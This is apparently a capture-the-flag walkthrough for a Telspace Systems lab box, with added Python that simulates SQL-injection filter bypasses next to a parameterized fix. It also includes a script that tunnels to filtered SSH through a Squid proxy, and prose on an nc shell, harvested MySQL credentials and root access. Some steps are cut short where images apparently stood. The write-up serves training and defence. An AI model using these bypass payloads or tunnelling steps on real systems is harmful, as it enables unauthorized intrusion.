This CTF was designed by Telspace Systems for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town).
An aggressive scan of all ports gave us:

PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
3128/tcp open     http-proxy Squid http proxy 3.1.20
|_http-server-header: squid/3.1.20
|_http-title: ERROR: The requested URL could not be retrieved

Quite simple. The default web page looks
Good. I tried to log in using default credentials, but without success. So I examined SQL injection and got an SQL syntax error, because the OR and "=" parts are filtered. So let's try to bypass the filtering.
I found a very useful list of filter bypasses
I used the first one from the list and got
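To show why a keyword blacklist like the one above does not stop an authentication bypass, here is an added example (not code from the CTF, and not the payload the walkthrough used). It simulates the login check in Python with an in-memory SQLite table (a constructed sample user, hypothetical password) and a filter that rejects OR and "=". Two payloads that contain neither token still log in: a comment that cuts off the password clause when a username is known, and a UNION that fabricates a matching row when it is not. The parameterized version below it is the fix.

```python
import re
import sqlite3


def make_db():
    """Constructed sample schema and user; the real application's table is unknown."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('alice', 'hypothetical-secret')")
    conn.commit()
    return conn


def blacklist_filter(value):
    """Assumed filter of the kind the walkthrough ran into: reject the word OR and any '='."""
    return not re.search(r"\bor\b|=", value, re.IGNORECASE)


def login_vulnerable(conn, username, password):
    """String-built query behind a keyword blacklist: returns 'blocked', a username, or None."""
    if not (blacklist_filter(username) and blacklist_filter(password)):
        return "blocked"
    query = "SELECT username FROM users WHERE username = '%s' AND password = '%s'" % (
        username, password)
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: user input never becomes SQL syntax, so no filter is needed.
    (A real application would also store and compare a password hash, not plaintext.)"""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# Payloads that avoid both blacklisted tokens (assumed examples, not the CTF's payload).
COMMENT_BYPASS = "alice'-- "                    # known username: comment out the password check
UNION_BYPASS = "' UNION SELECT 'attacker' -- "  # unknown username: fabricate a matching row


def demo():
    conn = make_db()
    return {
        "classic_tautology": login_vulnerable(conn, "' OR '1'='1", "x"),  # caught by the filter
        "comment_bypass": login_vulnerable(conn, COMMENT_BYPASS, "wrong"),
        "union_bypass": login_vulnerable(conn, UNION_BYPASS, "x"),
        "safe_comment_bypass": login_safe(conn, COMMENT_BYPASS, "wrong"),
        "safe_valid_login": login_safe(conn, "alice", "hypothetical-secret"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print("%-20s %r" % (name, result))
```

The filter blocks the textbook `' OR '1'='1`, but both alternative payloads pass it and return a row, while the parameterized `login_safe` treats the same strings as literal usernames and finds nothing. Blacklisting tokens only changes which payload works.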
Excellent! But we have a little problem: SSH is filtered... We know that the target also serves an HTTP proxy. Maybe we can connect to SSH through the http-proxy. I configured ProxyChains and
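What ProxyChains does in `http` mode is send an HTTP CONNECT request to the proxy and, on a 200 reply, treat the socket as a raw tunnel to the destination. The added example below (my own code, not part of the walkthrough; the host 10.0.0.5 and the reply bytes are constructed samples) builds that request, parses the proxy's answer, and opens the tunnel so the SSH banner can be read through Squid. The practical caveat it handles: a stock squid.conf only allows CONNECT to port 443 (`acl SSL_ports port 443` with `http_access deny CONNECT !SSL_ports`), so a 403 means the proxy will not tunnel to port 22 and ProxyChains would fail the same way.

```python
import socket
import sys


def build_connect_request(dst_host, dst_port):
    """The HTTP CONNECT request an HTTP proxy expects (what proxychains sends in 'http' mode)."""
    target = "%s:%d" % (dst_host, dst_port)
    return ("CONNECT %s HTTP/1.1\r\nHost: %s\r\n\r\n" % (target, target)).encode()


def parse_connect_response(raw):
    """Return (status code, bytes received after the headers).

    With a 200 the tunnel is open and any trailing bytes already belong to the inner
    protocol (for SSH, the server's version banner). Anything else is a proxy error.
    """
    head, sep, rest = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete proxy response")
    status_line = head.split(b"\r\n", 1)[0]
    parts = status_line.split()
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/"):
        raise ValueError("not an HTTP status line: %r" % status_line)
    return int(parts[1]), rest


def connect_via_http_proxy(proxy_host, proxy_port, dst_host, dst_port, timeout=10):
    """Open a CONNECT tunnel and return (socket, leftover bytes) or raise ConnectionError."""
    sock = socket.create_connection((proxy_host, proxy_port), timeout=timeout)
    sock.sendall(build_connect_request(dst_host, dst_port))
    buf = b""
    while b"\r\n\r\n" not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            sock.close()
            raise ConnectionError("proxy closed the connection before answering CONNECT")
        buf += chunk
    status, leftover = parse_connect_response(buf)
    if status != 200:
        sock.close()
        raise ConnectionError("proxy refused CONNECT to %s:%d (HTTP %d)" % (dst_host, dst_port, status))
    return sock, leftover


def read_ssh_banner(sock, leftover=b""):
    """Read the first line the SSH server sends through the tunnel (RFC 4253 version string)."""
    buf = leftover
    while b"\n" not in buf:
        chunk = sock.recv(256)
        if not chunk:
            break
        buf += chunk
    return buf.split(b"\n", 1)[0].rstrip(b"\r").decode(errors="replace")


# Constructed sample replies (not captured from the CTF box).
SAMPLE_TUNNEL_OK = b"HTTP/1.1 200 Connection established\r\n\r\nSSH-2.0-OpenSSH_6.0\r\n"
SAMPLE_TUNNEL_DENIED = (b"HTTP/1.0 403 Forbidden\r\nServer: squid/3.1.20\r\n"
                        b"Content-Type: text/html\r\n\r\n<html>ERROR: Access Denied</html>")


if __name__ == "__main__":
    # usage: python tunnel.py <proxy_host> <proxy_port> <ssh_host> [ssh_port]
    proxy_host, proxy_port, ssh_host = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    ssh_port = int(sys.argv[4]) if len(sys.argv) > 4 else 22
    sock, leftover = connect_via_http_proxy(proxy_host, proxy_port, ssh_host, ssh_port)
    print("banner through proxy:", read_ssh_banner(sock, leftover))
    sock.close()
```

Once the banner comes back, the equivalent ProxyChains setup is a `http <target> 3128` line under `[ProxyList]` in proxychains.conf followed by `proxychains ssh user@<target>`; if this script gets a 403 instead, the Squid ACLs are the problem and no client-side proxy tooling will get around it.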
We are not logged in... Hmm, but we know that we can execute a command over SSH; let's test our idea.
Excellent! Let's try using nc to maintain a session.
Yeah! We have a limited shell! In the /var/www/ directory I found a login.php file that contains credentials for MySQL (root:root).
Excellent! Let's log in as sara and check what we can do as root.
Amazing! We can cat the flag.txt from the root directory!
and...
Game over!